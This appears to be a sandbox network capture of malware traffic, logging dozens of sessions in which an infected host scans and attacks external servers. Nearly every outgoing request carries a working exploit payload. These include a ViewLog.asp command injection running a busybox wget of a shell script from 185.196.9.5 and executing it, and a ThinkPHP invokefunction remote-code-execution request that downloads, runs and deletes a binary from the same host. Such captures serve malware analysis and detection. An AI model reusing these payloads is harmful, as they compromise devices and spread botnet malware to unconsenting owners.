Feb 25, 2024 19:04:30.181402922 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
313	192.168.2.15	60890	94.85.83.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.823645115 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:17.010989904 CET	1202	IN	HTTP/1.1 307 Temporary Redirect Date: Sun, 25 Feb 2024 18:03:16 GMT Content-Type: text/html Content-Length: 152 Connection: close Location: https://185.196.9.5:8080/cgi-bin/ViewLog.asp X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self' X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self' X-Webkit-CSP: default-src 'self'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; connect-src 'self'; font-src 'self'; object-src 'self'; media-src 'self'; child-src 'self' Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body bgcolor="white"><center><h1>307 Temporary Redirect</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
314	192.168.2.15	47036	62.171.152.92	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.825071096 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:17.022406101 CET	521	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:16 GMT Server: Apache X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Referrer-Policy: strict-origin Permissions-Policy: vibrate=(self), usermedia=(*), microphone=(none), payment=(none), sync-xhr=(self 'cartes2visite.com') Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
315	192.168.2.15	35380	94.187.111.110	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.849675894 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
316	192.168.2.15	46336	94.121.127.143	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:16.859018087 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
317	192.168.2.15	58526	95.86.121.40	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.035805941 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
318	192.168.2.15	58282	85.28.171.79	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.055586100 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
319	192.168.2.15	50286	88.99.251.122	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.526942015 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:18.114128113 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:18.298132896 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:18 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
320	192.168.2.15	53198	88.99.236.140	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.526993990 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:18.113998890 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:18.298177004 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:18 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
321	192.168.2.15	59920	88.221.61.35	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.527036905 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:17.713835955 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:03:17 GMT Date: Sun, 25 Feb 2024 18:03:17 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 35 65 36 63 63 31 26 23 34 36 3b 31 37 30 38 38 38 34 31 39 37 26 23 34 36 3b 39 62 63 38 37 65 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.985e6cc1.1708884197.9bc87ef</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
322	192.168.2.15	55330	31.44.130.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.674926043 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
323	192.168.2.15	52356	94.122.126.60	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.674928904 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
324	192.168.2.15	45188	31.44.138.172	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:17.675127029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
325	192.168.2.15	37310	31.136.137.148	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:18.085767984 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:18.662297964 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:19.814023018 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.341996908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:26.949948072 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:36.165909052 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:55.365694046 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:32.229454994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
326	192.168.2.15	36456	94.120.59.34	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:18.125875950 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
327	192.168.2.15	53836	31.223.116.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:18.149611950 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:18.397871971 CET	224	IN	HTTP/1.1 403 Forbidden Content-Type: text/html; charset=utf-8 Content-Length: 106 Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
328	192.168.2.15	44386	62.29.36.67	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:20.649359941 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
329	192.168.2.15	52684	94.122.114.170	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:20.649600029 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
330	192.168.2.15	47034	62.29.54.176	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:20.878643036 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
331	192.168.2.15	59828	94.122.80.253	8080

Timestamp	Bytes transferred	Direction	Data
